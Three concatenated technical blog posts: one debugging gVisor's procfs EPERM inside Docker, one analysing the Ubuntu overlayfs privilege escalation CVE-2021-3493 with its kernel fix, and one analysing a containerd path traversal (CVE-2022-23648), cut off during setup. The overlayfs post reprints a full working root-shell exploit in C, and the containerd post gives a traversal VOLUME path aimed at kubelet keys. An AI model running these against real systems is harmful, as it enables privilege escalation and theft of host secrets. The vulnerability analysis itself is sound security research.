<p>gVisor is quite interesting in that it reimplements the Linux syscall interface. The foundation of gVisor is system call interception. gVisor has three means of system call interception: ptrace, KVM and systrap. gVisor uses these to intercept the application’s syscalls and reimplement them in the Sentry.</p>
<p>Though gVisor is mostly used in the cloud native ecosystem, it is also useful as a process-level sandbox. I have designed a process-level sandbox based on gVisor to sandbox dangerous third-party programs.</p>
<p>Recently I encountered a problem running gVisor in an unprivileged container such as docker or podman. When I run gVisor in docker it returns an EPERM error. The following shows the error.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined ubuntu
root@21adbdee0c6d:/# cd /tmp
root@21adbdee0c6d:/tmp# ./runsc -rootless --debug --debug-log=/tmp/log/ do ls
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
creating container: cannot create sandbox: cannot read client sync file: waiting for sandbox to start: EOF
root@21adbdee0c6d:/tmp# cd log/
root@21adbdee0c6d:/tmp/log# ls
...
W1227 04:54:24.366822 1 specutils.go:124] noNewPrivileges ignored. PR_SET_NO_NEW_PRIVS is assumed to always be set.
W1227 04:54:24.366995 1 util.go:64] FATAL ERROR: error mounting proc: operation not permitted
error mounting proc: operation not permitted
root@21adbdee0c6d:/tmp/log#
</code></pre></div></div>
<p>After navigating the code, I found the error occurs when <a href="https://github.com/google/gvisor/blob/master/runsc/cmd/gofer.go#L394C21-L394C21">mounting procfs</a>:
mounting procfs inside a docker container returns EPERM.</p>
<h3> Analysis </h3>
<p>The mount syscall has several points at which it can return EPERM. We need to find which one causes gVisor to fail.</p>
<p>I used the following method. First, patch gVisor to add sleep code before the mount procfs error, then run runsc. The gofer process (where the mount failure occurs) will sleep. We then use trace-cmd to trace the gofer process’ kernel function calls.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> trace-cmd record -P <goferpid> function_graph
</code></pre></div></div>
<p>After looking at the trace output, I found the suspicious function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> | security_sb_kern_mount();
| mount_too_revealing() {
| down_read() {
| __cond_resched();
| }
| _raw_spin_lock();
| _raw_spin_unlock();
| up_read();
| }
| fc_drop_locked() {
</code></pre></div></div>
<p>From the trace we can see that ‘mount_too_revealing’ returns true and is responsible for our EPERM. ‘mount_too_revealing’ calls ‘mnt_already_visible’ to make the decision. As my <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/06/cve-2022-0492">previous blog</a> said:</p>
<p>‘mnt_already_visible’ iterates over the new mount namespace and checks whether the existing procfs mount has child mountpoints. If it has child mountpoints, procfs is not fully visible to this mount namespace, so a new procfs will not be mounted. The reason is as follows: procfs and sysfs contain some global data that the container should not touch, so mounting procfs and sysfs in a new user namespace has to be restricted; if it were allowed, we could mount a fresh procfs in the new user namespace and read all of its data. In docker and runc environments, the config has ‘maskedPaths’, the paths that should be masked in the container.</p>
<p>I also found an old discussion in a <a href="https://github.com/opencontainers/runc/issues/1658">runc issue</a>. The reason is just as described above, and Alban Crequy gives <a href="https://github.com/opencontainers/runc/issues/1658#issuecomment-375750981">two solutions</a>.</p>
<ol>
<li>
<p>by adding ‘-v /proc:/newproc’ to the docker command; runsc can then see a full procfs, so there is no EPERM</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined -v /proc:/newproc ubuntu
root@0723fa9d5c92:/# cd /tmp/
root@0723fa9d5c92:/tmp# ls
runsc
root@0723fa9d5c92:/tmp# ./runsc --rootless do ls
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
runsc runsc-do1613356723
root@0723fa9d5c92:/tmp#
</code></pre></div> </div>
</li>
<li>
<p>by first creating a dead pidns, then mounting its procfs into the docker container</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # unshare -p -f mount -t proc proc /mnt/proc
# docker run -it --rm --security-opt apparmor=unconfined --security-opt seccomp=unconfined -v /mnt/proc:/newproc ubuntu
root@eda100eadf1f:/# cd /tmp
root@eda100eadf1f:/tmp# ./runsc --rootless do ls
*** Warning: sandbox network isn't supported with --rootless, switching to host ***
runsc runsc-do1925241706
root@eda100eadf1f:/tmp#
</code></pre></div> </div>
</li>
</ol>
<p>Neither solution is very elegant. Luckily runsc doesn’t need to mount a whole procfs here; it just needs to open /proc/self/fd and read some generic files. Andrei Vagin has prepared a <a href="https://github.com/google/gvisor/commit/063ee51c57f6cd5c64aa0d115396941dce455b8b">patch</a> to address this issue without any tricks: it bind mounts the current /proc instead of mounting a new procfs instance.</p>
<h3> Conclusion </h3>
<ol>
<li>The mount syscall needs CAP_SYS_ADMIN. An unprivileged user can get CAP_SYS_ADMIN in a new user ns. A filesystem can allow being mounted in a new user ns by specifying the ‘FS_USERNS_MOUNT’ flag.</li>
<li>procfs and sysfs can be mounted in a new user ns, but if the existing procfs or sysfs mount has child mounts, the mount syscall will return EPERM.</li>
</ol>
<p>Not all filesystems can be mounted in a non-root user namespace; there is a permission check in the mount syscall.</p>
<h3> Ref </h3>
<ol>
<li>gVisor issue: https://github.com/google/gvisor/issues/8205</li>
<li>runc issue: https://github.com/opencontainers/runc/issues/1658</li>
</ol>
CVE-2021-3493 Ubuntu overlayfs privilege escalation vulnerability analysis2022-09-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/09/12/CVE-2021-3493-ubuntu-overlayfs-escalation
<p>CVE-2021-3493 is a logic vulnerability in the overlayfs filesystem; combined with a change Ubuntu made, it can be exploited for privilege escalation. This post introduces the background, the root cause and the fix of this vulnerability.</p>
<h3> Overlayfs </h3>
<p>Overlayfs is a filesystem that combines one upper-layer directory tree and several lower-layer directory trees into a single filesystem. The upper layer is mounted read-write and the lower layers are mounted read-only. Filesystem operations on overlayfs are always redirected to the upper or lower layer.
The following picture shows the basic concepts of overlayfs (from <a href="https://arkingc.github.io/2017/09/20/2017-09-20-linux-code-overlayfs-layerinfo/">this post</a>).</p>
<p><img src="/assets/img/cve_2021_3493/1.png" alt="" /></p>
<p>The following picture shows a basic usage of overlayfs.</p>
<p><img src="/assets/img/cve_2021_3493/2.png" alt="" /></p>
<p>As we can see, when we create a file that doesn’t exist in the upper or lower directory, the file is created in the upper directory and remains there even after the overlayfs is unmounted. Not only create operations: most (if not all) file operations are redirected to the upper or lower directory, which causes the corresponding filesystem operations to be called there. Let’s see the creation process.</p>
<p><img src="/assets/img/cve_2021_3493/3.png" alt="" /></p>
<p>‘ovl_new_inode’ creates the inode of the overlayfs layer, and ‘vfs_create’ creates the file in the upper-layer directory; this is the ‘real’ file. Let’s see another call chain, the one for the vulnerable setxattr.</p>
<p><img src="/assets/img/cve_2021_3493/4.png" alt="" /></p>
<p>Notice that we again see double ‘vfs_setxattr’ calls: the first is for the overlayfs layer and the second is for the upper-directory file, the real file. Also notice that ‘cap_convert_nscap’ is called before the first ‘vfs_setxattr’ call, but not before the second. This is the key point of this vulnerability.</p>
<p>This is the overlayfs background needed to understand this vulnerability. Overlayfs is widely used in containers.</p>
<h3> Capabilities </h3>
<p>Linux capabilities divide the privileges traditionally associated with the superuser into distinct units. To assign capabilities to a process, the binary file itself can be assigned capabilities. An example is the ‘ping’ binary: the ‘ping’ process needs to construct raw sockets, which requires the cap_net_raw capability. In order to let unprivileged users use ‘ping’, the binary needs to be assigned ‘cap_net_raw’.</p>
<p>The binary’s capabilities are assigned via ‘extended attributes’. The following picture shows the ‘ping’ binary case.</p>
<p><img src="/assets/img/cve_2021_3493/5.png" alt="" /></p>
<p>If the binary has been assigned capabilities, ‘security.capability’ has a corresponding value. If not, the file has no such extended attribute at all, as with the ‘ls’ binary.</p>
<p>When a binary which has capabilities is executed, the kernel assigns the capabilities to the process. This is like a ‘suid’ binary, except that the ‘suid’ bit is set in the file attributes in the inode (if I remember correctly). The following picture shows that the ‘su’ binary has no ‘security.capability’ extended attribute.</p>
<p><img src="/assets/img/cve_2021_3493/6.png" alt="" /></p>
<p>struct cred stores the capabilities of a process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct cred {
...
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
...
} __randomize_layout;
</code></pre></div></div>
<p>The meaning of each cap set is not the topic of this post. ‘cap_effective’ is the set used in capability permission checks. When the binary has file capabilities set, ‘get_vfs_caps_from_disk’ is called during the ‘execve’ syscall to read them from the binary file, then ‘bprm_caps_from_vfs_caps’ is called to set the cred’s cap_permitted.</p>
<h3> Mount filesystem in new user namespace </h3>
<p>Not all filesystem can be mounted in non-root user namespace. There is a permission check in mount syscall.</p>
<p><img src="/assets/img/cve_2021_3493/7.png" alt="" /></p>
<p>If the filesystem’s fs_flags has no FS_USERNS_MOUNT set, the init user ns is used to check the CAP_SYS_ADMIN capability. Otherwise, ‘fc->user_ns’ is used. For a new mount, ‘fc->user_ns’ is set to the current process’s user ns.</p>
<p><img src="/assets/img/cve_2021_3493/8.png" alt="" /></p>
<p>Only a few filesystems set ‘FS_USERNS_MOUNT’: procfs, sysfs, ramfs, tmpfs and so on. Only these can be mounted in a non-root user namespace.</p>
<p>Notice that when the mount syscall is handled, there is also a check whether the mount namespace’s user ns has CAP_SYS_ADMIN.</p>
<p><img src="/assets/img/cve_2021_3493/9.png" alt="" /></p>
<h3> The vulnerability </h3>
<p>This vulnerability is Ubuntu-specific. Overlayfs can’t be mounted in a non-root user namespace in the upstream mainline Linux kernel, but Ubuntu changed this behaviour by adding ‘FS_USERNS_MOUNT’ to the overlayfs filesystem.
The upstream ‘ovl_fs_type’ definition.</p>
<p><img src="/assets/img/cve_2021_3493/10.png" alt="" /></p>
<p>The Ubuntu ‘ovl_fs_type’ from <a href="https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/focal/tree/fs/overlayfs/super.c?h=Ubuntu-5.4.0-42.46">here</a>.</p>
<p><img src="/assets/img/cve_2021_3493/11.png" alt="" /></p>
<p>But there is also an upstream bug which, combined with Ubuntu’s change, becomes exploitable as a vulnerability.
Let’s recap the setxattr call chain.</p>
<p><img src="/assets/img/cve_2021_3493/12.png" alt="" /></p>
<p>When userspace triggers a setxattr syscall on an overlayfs file, ‘cap_convert_nscap’ is called. When the size indicates this is the cap v2 format, ‘cap_convert_nscap’ calls ‘ns_capable’ to check the permission.</p>
<p><img src="/assets/img/cve_2021_3493/13.png" alt="" /></p>
<p>Here ‘cap_convert_nscap’ checks whether the ‘inode->i_sb->s_user_ns’ user ns has the ‘CAP_SETFCAP’ capability.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ns_capable(inode->i_sb->s_user_ns, CAP_SETFCAP))
</code></pre></div></div>
<p>‘inode->i_sb->s_user_ns’ is assigned by the following call chain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ovl_mount
-->mount_nodev
-->sget
-->alloc_super
struct super_block *sget(struct file_system_type *type,
int (*test)(struct super_block *,void *),
int (*set)(struct super_block *,void *),
int flags,
void *data)
{
struct user_namespace *user_ns = current_user_ns();
...
if (!s) {
spin_unlock(&sb_lock);
s = alloc_super(type, (flags & ~SB_SUBMOUNT), user_ns);
if (!s)
return ERR_PTR(-ENOMEM);
goto retry;
}
...
}
static struct super_block *alloc_super(struct file_system_type *type, int flags,
struct user_namespace *user_ns)
{
struct super_block *s = kzalloc(sizeof(struct super_block), GFP_USER);
static const struct super_operations default_op;
int i;
if (!s)
return NULL;
INIT_LIST_HEAD(&s->s_mounts);
s->s_user_ns = get_user_ns(user_ns);
}
</code></pre></div></div>
<p>As we can see, ‘s->s_user_ns’ is initialized from the user ns of the process calling ‘mount’, which in the exploit is a new user ns that has full capabilities. Here the ‘inode’ is the inode that overlayfs created, so its superblock’s s_user_ns is the new user ns, and a new user ns has CAP_SETFCAP. So ‘ns_capable’ returns true, which means the process has ‘CAP_SETFCAP’ in this new user ns.</p>
<p>Returning to the setxattr call chain: after the ‘cap_convert_nscap’ permission check passes, ‘vfs_setxattr’ is called the first time, using the overlayfs layer’s dentry. Then it goes to the upper dir’s ‘vfs_setxattr’; as the upperdir is a directory on the host filesystem (ext4), the ext4 setxattr (ext4_xattr_set) is called and the extended attributes are finally written to the upperdir file.</p>
<h3> Exploit </h3>
<p>Following exploit is copied from the <a href="https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/">ssd-disclosure</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mount.h>
//#include <attr/xattr.h>
//#include <sys/xattr.h>
int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);
#define DIR_BASE "./ovlcap"
#define DIR_WORK DIR_BASE "/work"
#define DIR_LOWER DIR_BASE "/lower"
#define DIR_UPPER DIR_BASE "/upper"
#define DIR_MERGE DIR_BASE "/merge"
#define BIN_MERGE DIR_MERGE "/magic"
#define BIN_UPPER DIR_UPPER "/magic"
static void xmkdir(const char *path, mode_t mode)
{
if (mkdir(path, mode) == -1 && errno != EEXIST)
err(1, "mkdir %s", path);
}
static void xwritefile(const char *path, const char *data)
{
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "open %s", path);
ssize_t len = (ssize_t) strlen(data);
if (write(fd, data, len) != len)
err(1, "write %s", path);
close(fd);
}
static void xcopyfile(const char *src, const char *dst, mode_t mode)
{
int fi, fo;
if ((fi = open(src, O_RDONLY)) == -1)
err(1, "open %s", src);
if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)
err(1, "open %s", dst);
char buf[4096];
ssize_t rd, wr;
for (;;) {
rd = read(fi, buf, sizeof(buf));
if (rd == 0) {
break;
} else if (rd == -1) {
if (errno == EINTR)
continue;
err(1, "read %s", src);
}
char *p = buf;
while (rd > 0) {
wr = write(fo, p, rd);
if (wr == -1) {
if (errno == EINTR)
continue;
err(1, "write %s", dst);
}
p += wr;
rd -= wr;
}
}
close(fi);
close(fo);
}
static int exploit()
{
char buf[4096];
sprintf(buf, "rm -rf '%s/'", DIR_BASE);
system(buf);
xmkdir(DIR_BASE, 0777);
xmkdir(DIR_WORK, 0777);
xmkdir(DIR_LOWER, 0777);
xmkdir(DIR_UPPER, 0777);
xmkdir(DIR_MERGE, 0777);
uid_t uid = getuid();
gid_t gid = getgid();
if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
err(1, "unshare");
xwritefile("/proc/self/setgroups", "deny");
sprintf(buf, "0 %d 1", uid);
xwritefile("/proc/self/uid_map", buf);
sprintf(buf, "0 %d 1", gid);
xwritefile("/proc/self/gid_map", buf);
sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);
if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
err(1, "mount %s", DIR_MERGE);
// all+ep
char cap[] = "\x01\x00\x00\x02\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00";
xcopyfile("/proc/self/exe", BIN_MERGE, 0777);
if (setxattr(BIN_MERGE, "security.capability", cap, sizeof(cap) - 1, 0) == -1)
err(1, "setxattr %s", BIN_MERGE);
return 0;
}
int main(int argc, char *argv[])
{
if (strstr(argv[0], "magic") || (argc > 1 && !strcmp(argv[1], "shell"))) {
setuid(0);
setgid(0);
execl("/bin/bash", "/bin/bash", "--norc", "--noprofile", "-i", NULL);
err(1, "execl /bin/bash");
}
pid_t child = fork();
if (child == -1)
err(1, "fork");
if (child == 0) {
_exit(exploit());
} else {
waitpid(child, NULL, 0);
}
execl(BIN_UPPER, BIN_UPPER, "shell", NULL);
err(1, "execl %s", BIN_UPPER);
}
</code></pre></div></div>
<p>The exploit works as follows:</p>
<ol>
<li>create a child process</li>
<li>child: create the lowerdir, upperdir, workdir, mergedir</li>
<li>child: unshare to create a new mount ns and user ns, and write the uid_map and gid_map file for new user ns</li>
<li>child: mount overlayfs in the new user ns; this only works on Ubuntu as Ubuntu carries a change for overlayfs</li>
<li>child: copy the exploit binary to the merge directory; this actually creates a new file in upperdir</li>
<li>child: setxattr on the exploit binary in the merge dir; this finally sets the file’s xattr in upperdir, as the second ‘vfs_setxattr’ call sets the file’s capabilities directly</li>
<li>parent: execute the exploit binary in upperdir with the ‘shell’ argument</li>
<li>parent: setuid(0), setgid(0) and then execute a bash. As the exploit binary in upperdir has all capabilities, setuid(0) will succeed</li>
</ol>
<h3> The fix </h3>
<p>The fix is in <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7c03e2cda4a584cadc398e8f6641ca9988a39d52">this commit</a>.
The change moves the ‘cap_convert_nscap’ permission check from ‘setxattr’ to ‘vfs_setxattr’. Thus the second call of ‘vfs_setxattr’, with the ext4 filesystem’s dentry, is also checked by ‘cap_convert_nscap’. Because the ext4 superblock’s user ns is the init user ns and the process has no ‘CAP_SETFCAP’ in that user ns, the check fails, and the exploit no longer works.</p>
<p><img src="/assets/img/cve_2021_3493/14.png" alt="" /></p>
containerd CVE-2022-23648: path traversal never die2022-03-26T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2022/03/26/containerd-CVE-2022-23648
<h3> The spec </h3>
<p>Path traversal is a classic security issue in the computer world. It is a logic issue, so even with the rapid development of technology this kind of issue still
appears in software. This post analyzes a <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=2244">path traversal issue</a> in containerd which was discovered by <a href="https://twitter.com/_fel1x">Felix Wilhelm</a>. In the first part, let’s explain the related spec so that we know what the intended behaviour is and how the implementation violates it.</p>
<p>Containers have a concept of volumes. If a container has no volume, the data we change in the container disappears after the container is destroyed. In order to save data persistently or share data between containers, the concept of volumes was introduced. A volume is often (if not always) implemented using a bind mount. We can use -v in docker to add a volume.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# mkdir test
root@ubuntu:/home/test/CVE-2022-23648# echo "data in host" > test/aaa
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm -v /home/test/CVE-2022-23648/test:/test ubuntu bash
root@c201b6a39be2:/# mount | grep test
/dev/sda5 on /test type ext4 (rw,relatime,errors=remount-ro)
root@ecc59c1f5bc4:/# ls /test/
aaa
root@ecc59c1f5bc4:/# cat /test/aaa
data in host
root@ecc59c1f5bc4:/# echo "data in guest" >> /test/aaa
root@ecc59c1f5bc4:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# cat test/aaa
data in host
data in guest
</code></pre></div></div>
<p>‘docker inspect containerid’ on the host shows the data under “Mounts”.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "Mounts": [
{
"Type": "bind",
"Source": "/home/test/CVE-2022-23648/test",
"Destination": "/test",
"Mode": "",
"RW": true,
"Propagation": "rprivate"
}
],
</code></pre></div></div>
<p>The OCI image spec also has a field named ‘Volumes’. The <a href="https://github.com/opencontainers/image-spec/blob/main/config.md">definition</a> says it is ‘A set of directories describing where the process is likely to write data specific to a container instance’.</p>
<p>Let’s try to test this feature. First create a Dockerfile.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> from ubuntu:20.04
VOLUME /volume-test/
</code></pre></div></div>
<p>Build it and start a container. We can see there is a mount in the container.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /volume-test/
---> Running in 2b744c0f90ff
Removing intermediate container 2b744c0f90ff
---> 1cf01e39ec82
Successfully built 1cf01e39ec82
Successfully tagged volume-test:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test bash
root@a301238d982c:/# ls -lh /volume-test/
total 0
root@a301238d982c:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
</code></pre></div></div>
<p>‘docker inspect’ shows the mount information as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "Mounts": [
{
"Type": "volume",
"Name": "e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98",
"Source": "/var/lib/docker/volumes/e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98/_data",
"Destination": "/volume-test",
"Driver": "local",
"Mode": "",
"RW": true,
"Propagation": ""
}
],
</code></pre></div></div>
<p>The ‘docker image inspect’ show the following info:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "Volumes": {
"/volume-test/": {}
},
</code></pre></div></div>
<p>As we can see, the ‘Source’ is generated by the runtime itself and the ‘Destination’ is the name given to VOLUME.</p>
<p>As Felix points out, when this configuration is converted into an OCI runtime configuration, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md.</p>
<p>“Implementations SHOULD provide mounts for these locations such that application data is not written to the container’s root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location”</p>
<p>The key point here is ‘seed the contents of the mount with data in the image at the same location’: if the image already has data at the mount directory, the implementation should populate the mount with that original data.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
RUN mkdir /volume-test
RUN echo "volume data" > /volume-test/aaa
VOLUME /volume-test/
root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test1 .
Sending build context to Docker daemon 3.584kB
Step 1/4 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/4 : RUN mkdir /volume-test
---> Using cache
---> a05c3161c55d
Step 3/4 : RUN echo "volume data" > /volume-test/aaa
---> Running in 60702a1547f5
Removing intermediate container 60702a1547f5
---> 4702775454c2
Step 4/4 : VOLUME /volume-test/
---> Running in 14963733faf9
Removing intermediate container 14963733faf9
---> cc3e2700af76
Successfully built cc3e2700af76
Successfully tagged volume-test1:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test1 bash
root@20939034b463:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
root@20939034b463:/# ls /volume-test/
aaa
root@20939034b463:/# cat /volume-test/aaa
volume data
</code></pre></div></div>
<p>As we can see, the original data is in the volume; this is what ‘seeding’ the data means. If we investigate further we can see there are two copies of the file ‘aaa’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# find /var/lib/ -name aaa
/var/lib/docker/volumes/ed8dac626f22fe409ff7159aeb1cc59d90f506876ca655fd5896f007bbbfed36/_data/aaa
/var/lib/docker/overlay2/50c147cecab7d2310c82188c95f3e5711c4e8c096488ba275e143f21afe05123/diff/volume-test/aaa
/var/lib/docker/overlay2/45535f60b70e7185f78837ccac706cb03f3efcb7e0b01dd409aa1d314d8f857c/merged/volume-test/aaa
</code></pre></div></div>
<p>The first is the ‘data’ in the volume; the second and third are the same file, the one in the container image. The first file is copied from the second directory.</p>
<p>Now we know how ‘VOLUME’ works from OCI image configuration to OCI runtime configuration. In order to seed the data, the converter needs to copy the data from the original image into the container’s mount directory.</p>
<h3> The vulnerability </h3>
<p>The vulnerability occurs in containerd’s seeding process. Say we set the VOLUME to “/../../../../../../../../var/lib/kubelet/pki/”; then the copy will be:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> copy /var/lib/docker/overlay2/xxx/merged//../../../../../../../../var/lib/kubelet/pki/ /var/lib/docker/volumes/yyy/_data/
</code></pre></div></div>
<p>containerd tries to copy the files in the image to the volume, but it doesn’t check the src, and this src can be controlled through the OCI image configuration.</p>
<p>‘volumeMounts’ in ‘cri/server/container_create.go’ creates mounts from ‘Volumes’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *criService) volumeMounts(containerRootDir string, criMounts []*runtime.Mount, config *imagespec.ImageConfig) []*runtime.Mount {
...
var mounts []*runtime.Mount
for dst := range config.Volumes {
...
volumeID := util.GenerateID()
src := filepath.Join(containerRootDir, "volumes", volumeID)
// addOCIBindMounts will create these volumes.
mounts = append(mounts, &runtime.Mount{
ContainerPath: dst,
HostPath: src,
SelinuxRelabel: true,
})
}
return mounts
}
</code></pre></div></div>
<p>The ‘ContainerPath’ can be a malicious path.</p>
<p>Later in the same function the ‘HostPath’ is cleaned, but the ‘ContainerPath’ is not.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if len(volumeMounts) > 0 {
mountMap := make(map[string]string)
for _, v := range volumeMounts {
mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
}
opts = append(opts, customopts.WithVolumes(mountMap))
}
</code></pre></div></div>
<p>Finally, in ‘WithVolumes’ in ‘pkg/cri/opts/container.go’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for host, volume := range volumeMounts {
// The volume may have been defined with a C: prefix, which we can't use here.
volume = strings.TrimPrefix(volume, "C:")
for _, mountPath := range mountPaths {
src := filepath.Join(mountPath, volume)
if _, err := os.Stat(src); err != nil {
if os.IsNotExist(err) {
// Skip copying directory if it does not exist.
continue
}
return fmt.Errorf("stat volume in rootfs: %w", err)
}
if err := copyExistingContents(src, host); err != nil {
return fmt.Errorf("taking runtime copy of volume: %w", err)
}
}
}
</code></pre></div></div>
<p>Here ‘mountPath’ is the host directory pointing to a part of the container rootfs, ‘volume’ is the malicious path, and ‘host’ is the host directory that will be mounted into the container. The ‘src’ parameter of ‘copyExistingContents’ will look like ‘/xxx/xx/../../../../../../../../../etc’, which resolves to ‘/etc’ on the host filesystem. So ‘copyExistingContents’ copies host filesystem data into the container.</p>
<p>The fix is in this <a href="https://github.com/containerd/containerd/commit/fb0b8d6177538c0da2ddd81b90b8c5e6d96f8b0f">commit</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @@ -112,7 +112,10 @@ func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
// The volume may have been defined with a C: prefix, which we can't use here.
volume = strings.TrimPrefix(volume, "C:")
for _, mountPath := range mountPaths {
- src := filepath.Join(mountPath, volume)
+ src, err := fs.RootPath(mountPath, volume)
+ if err != nil {
+ return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
+ }
if _, err := os.Stat(src); err != nil {
if os.IsNotExist(err) {
// Skip copying directory if it does not exist.
</code></pre></div></div>
<p>It simply replaces ‘filepath.Join’ with ‘fs.RootPath’. ‘fs.RootPath’ evaluates any symlinks and ‘..’ components in ‘volume’ and bounds the result to the root directory.</p>
<h3> Reproduce </h3>
<p>The vulnerability itself is easy to understand, but I failed when I tried to use docker or ctr to reproduce it. Fu Wei, a containerd maintainer, told me I should use crictl, as the vulnerable code is shipped in the CRI plugin of containerd. This part is mostly about how to set up the crictl environment. In the process I asked a lot from Bonan and Fu Wei, thanks! The setup process is mostly from <a href="https://www.yinnote.com/containerd/">this post</a>.</p>
<h4> Download crictl and set the environment </h4>
<p>From the <a href="https://github.com/kubernetes-sigs/cri-tools/releases">cri-tools release page</a>, download the v1.23.0 version.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# tar -xzvf crictl-v1.23.0-linux-amd64.tar.gz -C /usr/bin
crictl
root@ubuntu:/home/test# crictl --version
crictl version v1.23.0
</code></pre></div></div>
<p>Create a new file /etc/crictl.yaml and add the following configuration.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> runtime-endpoint: unix:///var/run/containerd/containerd.sock
image-endpoint: unix:///var/run/containerd/containerd.sock
timeout: 10
debug: false
</code></pre></div></div>
<p>Create the containerd config file /etc/containerd/config.toml</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# mkdir /etc/containerd
root@ubuntu:/home/test# vi /etc/containerd/config.toml
root@ubuntu:/home/test# systemctl restart containerd
root@ubuntu:/home/test# cat /etc/containerd/config.toml
[plugins]
[plugins.cri]
sandbox_image = "rancher/pause:3.1"
[plugins.cri.cni]
bin_dir = "/opt/cni/bin"
conf_dir = "/etc/cni/net.d"
[plugins.cri.registry]
[plugins.cri.registry.mirrors]
[plugins.cri.registry.mirrors."docker.io"]
endpoint = ["https://docker.mirrors.ustc.edu.cn"]
[plugins.linux]
shim = "containerd-shim"
runtime = "runc"
runtime_root = ""
no_shim = false
shim_debug = false
</code></pre></div></div>
<p>Install the CNI plugins. Download them from the <a href="https://github.com/containernetworking/plugins/releases">CNI plugins release page</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/home/test# mkdir -p /opt/cni/bin
root@ubuntu:/home/test# tar -zxvf cni-plugins-linux-amd64-v1.1.1.tgz -C /opt/cni/bin
./
./macvlan
./static
./vlan
./portmap
./host-local
./vrf
./bridge
./tuning
./firewall
./host-device
